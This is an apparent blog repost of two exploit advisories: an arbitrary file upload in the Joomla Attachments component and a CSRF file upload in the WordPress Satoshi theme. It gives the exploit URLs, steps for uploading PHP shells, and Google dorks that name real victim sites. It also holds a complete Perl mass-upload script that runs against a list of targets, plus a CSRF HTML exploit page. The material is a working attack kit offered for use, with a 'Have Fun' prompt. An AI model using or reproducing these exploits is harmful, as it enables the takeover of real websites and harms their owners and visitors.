Friday, June 28, 2019

Joomla Com_Attachments Components 3.x Arbitrary File Upload - DarkX7

Image result for joomla



####################################################################

# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/05/2019
# Vendor Homepage : jmcameron.net
# Software Download Links : jmcameron.net/attachments/
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip
joomlacode.org/gf/project/attachments/frs/
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/
# Software Information Links : extensions.joomla.org/extension/attachments/
joomlacode.org/gf/project/attachments/
joomlacode.org/gf/project/attachments3/
# Joomla Affected Versions :
Joomla 3.4.8
Joomla 3.5.1
Joomla 3.6.5
Joomla 3.8.1
Joomla 3.8.11
Joomla 3.8.3
Joomla 3.9.6
# Software Affected Versions [ Component Com_Attachments ] : 
2.2.2 and 3.2.6 - 3.x / All previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : 
inurl:/index.php?option=com_attachments&task=upload
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.
intext:Treadmill Desk from TrekDesk
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla
intext:Fundación Jesuitas Paraguay
intext:© 2019 Mars Society Polska
intext:Designed by atict.com
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com
intext:Designed by Burosphere.
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional
and more on Google and other Search Engines...... Have Fun....
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt

####################################################################

# Description about Software :
***************************
The 'Attachments' extension allows files to be uploaded and attached to content
articles in Joomla. Includes a plugin to display attachments and a component
for uploading and managing attachments.

####################################################################

# Impact :
***********
Joomla Attachments Components 3.x and other previous versions could allow a 
remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation 
of file extensions by the multiple scripts to index.php. The issue occurs because 
the application fails to adequately sanitize user-supplied input. 
Exploiting this issue will allow attackers to execute arbitrary code within
the context of the affected application. This may facilitate unauthorized access 
or privilege escalation; other attacks may also possible. 
By sending a specially-crafted HTTP request, a remote attacker could exploit 
this vulnerability to upload a malicious PHP script, which could allow the 
attacker to execute arbitrary PHP code on the vulnerable system.

####################################################################

# Arbitrary File Upload/Unauthorized File Insertion Exploit :
****************************************************
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme

/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme

Click to " Select file to upload instead "  - Fill the Form -  Published =>  '' Yes '' and Click " Public "

Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.

# Directory File Path :
********************
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

source: https://packetstormsecurity.com/files/153088/Joomla-Attachments-3.x-File-Upload.html
Read More ->>

WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload - DarkX7


Image result for wordpress

####################################################################

# Exploit Title : WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/06/2019
# Vendor Homepage : vooshthemes.com - tecnoge.com - netsons.com
# WordPress Affected Versions : 4.7.13 - 3.4.2
# Theme Affected Version : 2.0
# Information Link : themesinfo.com/satoshi-theme-wordpress-portfolio-jpx
themesinfo.com/?search_type=folder&search=satoshi
# Theme used on : 106 websites
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Design By Voosh Themes
inurl:/wp-content/themes/satoshi/ - intext:Design By TecnoGe Informatica - 
# Vulnerability Type : 
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
*****************************
Satoshi v2.0 theme WordPress portfolio. A Free Portfolio Theme Developed By Voosh Themes.

####################################################################

# Impact :
***********
WordPress 3.4.2/4.7.13 Satoshi Themes 2.0 is prone to a vulnerability that lets attackers 
upload arbitrary files because it fails to adequately sanitize user-supplied input. 
An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access 
or privilege escalation; other attacks are also possible. This WordPress Theme is
vulnerable to CSRF file upload via ajaxupload.3.5.js. CSRF occurs when the web application 
does not, or can not, sufficiently verify whether a well-formed, valid, consistent request 
was intentionally provided by the user who submitted the request.

####################################################################

# Vulnerability :
***************
/wp-content/themes/satoshi/upload-file.php

Vulnerability Message :
*********************
error

Directory File Path :
******************
/wp-content/themes/satoshi/images/[YOURFILENAME].html

# Arbitrary File Upload / Unauthorized File Insert Perl Exploiter :
********************************************************
#!/usr/bin/perl
use LWP::UserAgent;
# Coded By KingSkrupellos
# Cyberizm Digital Security Army
# Perl Exploiter By CyBeRiZM :)
my $qqvul ="/upload-file.php";#theme path vul
my $datestring = localtime();
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
flag();
print "[+] Enter List Of Target : ";
chomp (my $list=<>);
print "[+] Enter Evil File : ";
chomp (my $file=<>);
print "[+] Started : $datestring\n";
open(my $arq,'<'.$list) || die($!);
my @site = <$arq>;
@site = grep { !/^$/ } @site;
close($arq);
print "[".($#site+1)."] URL to test upload\n\n"; 
my $i;
foreach my $web(@site){$i++;
    chomp($web);
    if($web !~ /^(http|https):\/\//){
        $web = 'http://'.$web;
    }
print "[$i] $web \n";
expqq($web);#exploiting website :)
} 
sub expqq{
my $useragent = randomagent();#Get a Random User Agent 
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept 
$ua->timeout(10);
$ua->agent($useragent);
print "[Testing] Exploit Existence \n";
my $url = $_[0]."/wp-content/themes/satoshi/".$qqvul;
my $ss = $_[0]."/wp-content/themes/satoshi/images/".$file;
my $response = $ua->get($url);
if ($response->is_success || $response->content=~/error/){
   print "[OK] Exploit Exists\n";
   print "[*] Sent payload\n";
   my $regex = 'success';
   my $body = $ua->post( $url,
        Content_Type => 'form-data',
        Content => [ 'uploadfile' => ["$file"] ]
   );
   if ($body->is_success ||$body->content=~ /$regex/){
      print "[+] Payload successfully executed\n";
      print "[*] Checking if shell was uploaded\n\n";
      my $res = $ua->get($ss);
      if ($res->is_success){
      print "[Upload] $_[0]/wp-content/satoshi/images/$file\n";
      }
      else {
      print "[Faild] check file\n";
      }
   } 
   else {print "[-] Payload failed : Not vulnerable\n";
   }
}
else {
print "[No] Exploit Not Found\n";
}
}
sub flag {print "\n[+] WP Satoshi Theme File Upload Exploiter By Cyberizm Digital Security Team \n[*] Coder => Cyberizm \n\n";
}

####################################################################

Cross Site Request Forgery CSRF Exploiter :
*****************************************
<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <title></title>
      <script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
      <script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script>

<script type='text/javascript'>//<![CDATA[ 
window.onload=function(){

 $(function(){
  var btnUpload=$('#upload');
  var status=$('#logo-upload-status');
  new AjaxUpload(btnUpload, {
   action: 'http://localhost/wp-content/themes/satoshi/upload-file.php',
   name: 'uploadfile',
   onSubmit: function(file, ext){
                /*
     if (! (ext && /^(jpg|png|jpeg|gif|html|txt)$/.test(ext))){ 
                    // extension is not allowed 
     status.text('Only HTML,TXT, JPG, PNG or GIF files are allowed');
     return false;
    }*/
    status.text('Uploading...');
   },
   onComplete: function(file, response){
    //On completion clear the status
    status.text('');
    //Add uploaded file to list
    if(response==="success"){
     $('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success');
     $('#satoshi_logo_image').val(file);
    } else{
     $('<li></li>').appendTo('#files').text(file).addClass('error');
    }
   }
  });
  
 });
}//]]>  
</script>

</head>
<body>
  
<span id="logo-upload-status"></span>
<input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value="">
<input type="button" class="background_pattern_button" id="upload" value="Choose Logo">
  
</body>
</html>

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

source:https://dl.packetstormsecurity.net/1906-exploits/wpsatoshi20-xsrfupload.txt
Read More ->>

Menu

Social Icons